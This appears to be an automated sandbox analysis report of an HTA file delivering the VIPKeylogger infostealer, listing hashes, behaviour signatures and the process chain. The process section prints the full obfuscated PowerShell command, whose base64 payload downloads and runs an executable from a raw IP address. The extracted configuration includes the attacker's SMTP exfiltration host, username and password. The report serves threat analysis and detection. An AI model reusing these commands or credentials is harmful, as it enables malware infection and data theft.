Analysis
-
max time kernel
135s -
max time network
136s -
platform
windows10-2004_x64 -
resource
win10v2004-20250129-en -
resource tags
arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system -
submitted
31-01-2025 07:02
Static task
static1
Behavioral task
behavioral1
Sample
weseethebestthingsevermadewithbestwithnewthingsgoodforme.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
weseethebestthingsevermadewithbestwithnewthingsgoodforme.hta
Resource
win10v2004-20250129-en
General
-
Target
weseethebestthingsevermadewithbestwithnewthingsgoodforme.hta
-
Size
15KB
-
MD5
933a3a73fc916b5969b456590f07639a
-
SHA1
8d89004f709477415b2eaff08dd8ff569013973e
-
SHA256
293e90ffa49e0d1a87813aeb2e071f47cce01b4e3772598ddb84f71963ad2806
-
SHA512
b7901179ddf0a2051a284b0522f3e49a6af378675a11e78c546c016c350714a6b37ef5e51cec6ce9af1204999cc394937797627f7da7d0dbb5e63e51b66ac01a
-
SSDEEP
48:3rN3QGu3nsQbP2wi+pgE71lW7L0v3LfPG:533u3pbP5iWgEHWS3j+
Malware Config
Extracted
vipkeylogger
Protocol: smtp- Host:
us2.smtp.mailhostbox.com - Port:
587 - Username:
[email protected] - Password:
^rtEwRy2 - Email To:
[email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vipkeylogger family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 13 1696 powershell.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 13 1696 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 1696 powershell.exe 832 cmd.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4003209913-3868522715-854928974-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 1 IoCs
pid Process 3136 suwce.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4003209913-3868522715-854928974-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-4003209913-3868522715-854928974-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-4003209913-3868522715-854928974-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 15 checkip.dyndns.org 17 reallyfreegeoip.org 19 reallyfreegeoip.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0009000000023c90-67.dat autoit_exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3136 set thread context of 4156 3136 suwce.exe 94 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language suwce.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1696 powershell.exe 1696 powershell.exe 4156 RegSvcs.exe 4156 RegSvcs.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3136 suwce.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1696 powershell.exe Token: SeDebugPrivilege 4156 RegSvcs.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 3136 suwce.exe 3136 suwce.exe -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 3136 suwce.exe 3136 suwce.exe -
Suspicious use of WriteProcessMemory 19 IoCs
description pid Process procid_target PID 4984 wrote to memory of 832 4984 mshta.exe 87 PID 4984 wrote to memory of 832 4984 mshta.exe 87 PID 4984 wrote to memory of 832 4984 mshta.exe 87 PID 832 wrote to memory of 1696 832 cmd.exe 90 PID 832 wrote to memory of 1696 832 cmd.exe 90 PID 832 wrote to memory of 1696 832 cmd.exe 90 PID 1696 wrote to memory of 868 1696 powershell.exe 91 PID 1696 wrote to memory of 868 1696 powershell.exe 91 PID 1696 wrote to memory of 868 1696 powershell.exe 91 PID 868 wrote to memory of 2220 868 csc.exe 92 PID 868 wrote to memory of 2220 868 csc.exe 92 PID 868 wrote to memory of 2220 868 csc.exe 92 PID 1696 wrote to memory of 3136 1696 powershell.exe 93 PID 1696 wrote to memory of 3136 1696 powershell.exe 93 PID 1696 wrote to memory of 3136 1696 powershell.exe 93 PID 3136 wrote to memory of 4156 3136 suwce.exe 94 PID 3136 wrote to memory of 4156 3136 suwce.exe 94 PID 3136 wrote to memory of 4156 3136 suwce.exe 94 PID 3136 wrote to memory of 4156 3136 suwce.exe 94 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4003209913-3868522715-854928974-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4003209913-3868522715-854928974-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\weseethebestthingsevermadewithbestwithnewthingsgoodforme.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4984 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C powersHEll.eXE -Ex BYPASs -noP -w 1 -c dEViCeCredENtiAldePloYmenT.exe ; iNVOke-expresSioN($(inVoKE-eXPrEsSion('[system.TexT.enCoDInG]'+[ChaR]0x3A+[ChAr]58+'UtF8.GetStRIng([sYSTEm.coNvERT]'+[chAr]0x3A+[ChaR]0X3a+'FROMbaSe64stRinG('+[CHaR]0X22+'JDM1ZVNBYiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CZXJkRUZJbml0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxtT24uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkTXEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdmc01LZllwWE8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhtQXBrY0RQVyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1mbmV6QixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ0FtQ0lUeWlrcyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUnZuVSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoVktyUk9BTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQzNWVTQWI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NC44MC4yMzAvMjM1L3N1d2NlLmV4ZSIsIiRFbnY6QVBQREFUQVxzdXdjZS5leGUiLDAsMCk7c1RBUlQtc2xlRVAoMyk7SU5WT0tlLUVYUFJlU1Npb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxzdXdjZS5leGUi'+[CHaR]0x22+'))')))"2⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:832 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowersHEll.eXE -Ex BYPASs -noP -w 1 -c dEViCeCredENtiAldePloYmenT.exe ; iNVOke-expresSioN($(inVoKE-eXPrEsSion('[system.TexT.enCoDInG]'+[ChaR]0x3A+[ChAr]58+'UtF8.GetStRIng([sYSTEm.coNvERT]'+[chAr]0x3A+[ChaR]0X3a+'FROMbaSe64stRinG('+[CHaR]0X22+'JDM1ZVNBYiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CZXJkRUZJbml0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxtT24uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkTXEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdmc01LZllwWE8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhtQXBrY0RQVyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1mbmV6QixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ0FtQ0lUeWlrcyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUnZuVSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoVktyUk9BTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQzNWVTQWI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NC44MC4yMzAvMjM1L3N1d2NlLmV4ZSIsIiRFbnY6QVBQREFUQVxzdXdjZS5leGUiLDAsMCk7c1RBUlQtc2xlRVAoMyk7SU5WT0tlLUVYUFJlU1Npb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxzdXdjZS5leGUi'+[CHaR]0x22+'))')))"3⤵
- Blocklisted process makes network request
- Downloads MZ/PE file
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xrhtenom\xrhtenom.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:868 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8A6.tmp" "c:\Users\Admin\AppData\Local\Temp\xrhtenom\CSC7E0DEA24DEC14069921919E74924455.TMP"5⤵
- System Location Discovery: System Language Discovery
PID:2220
-
-
-
C:\Users\Admin\AppData\Roaming\suwce.exe"C:\Users\Admin\AppData\Roaming\suwce.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3136 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Roaming\suwce.exe"5⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:4156
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD509d68b2b7044a746f2ea3e84b1f2244f
SHA164eadcf47c8fb7c045d716dbd4d9ffe48372ff55
SHA256e05ea8459e9cfe2dcf8e08208648f9df175b410cd02ad667be7068431ea0f47c
SHA51296bf64fb7df9d813d70a7110f58b4ea6176cac14be1dc746d989c5b35abb2ca2c3b35801a4495314da48fdc6708f44491626a1185728cadee5bda49dc44f7474
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD55327621c3874a50655efd927e54d2737
SHA12d0a02bf319d0bd60d4402acbc254df86d8844de
SHA2568b1484cdaf6f3bb5295f6360a0372feb381bf01015c55e5475dd4a507c770406
SHA512847259c3a19ce29b876692fffe110f4209425dd03fd68d43526fc5b22dd5227488e5497094b91a310b6760e50bff648a2964c30d1f5fcbece482e7f87b53bcae
-
Filesize
993KB
MD5bec536220cd7d3a6e449502f08273664
SHA1b102bbdefeabc2ec9c84e9fdea7afce6cacf7470
SHA256471fa9a125c98decd00e727886e5ddf15da64cb1456d29b15c344c4239872167
SHA51281da4936c04671a6515e59ff8c779c6e8ca68ae9e882a3ef0275784fcd95ac231e18ab5add00c12967511f4a0247037cba76588cc8bff0fceab3b13f118301c4
-
Filesize
652B
MD5ee2513e1d3fc4a1ab338b3757b61a8d3
SHA11e08d7f7d1fdb975e31043ced9c39cd2e134e2cc
SHA256a18a0be9b04fdbe24a116dbe613d2f798c6dddb585858e4a6610f16b08a06599
SHA51214b8249dfa1c8d21ef5e595b79618fc5fc0934313a5ce315baa7cb0e68c27e9d3de047effd5ed20163a8cb7560b62d5feb2a6f2e4cf884046a43d653d3f8ec6a
-
Filesize
493B
MD50590d85aef00ec7aa3ddaa98b975a41e
SHA1ba8668bc1a99dd42b4b4f4e16f762b40ab4f1917
SHA256a1b294d2c2f9fa6137935ec5800c37f5044714396a39a4377eaa07f1827f6da0
SHA5122e8c18dbf6a85c762c0c36417070c17d5f15442a4471147751311cdb05a7393e363d151dec66028d8de17a3a7853b87f00c61dfdd7f7171e9bd4d6ec50720687
-
Filesize
369B
MD5275ba11363041e34641ea643e186be11
SHA1c83fcac728edc8b460c05af573f263d566faf22a
SHA256a85cb6c5be462840a46179100e7691da0ff8474c9f7d43619076541ca7669d9d
SHA512b89cec43ac721f8363520fa848d187f6b4c17909bc849e6ddd1cfb6fbb44401f28e54b961ba48b27b5ac1fbe805b7c06ff6610c5b7ade6aed9261dae9c7f39f4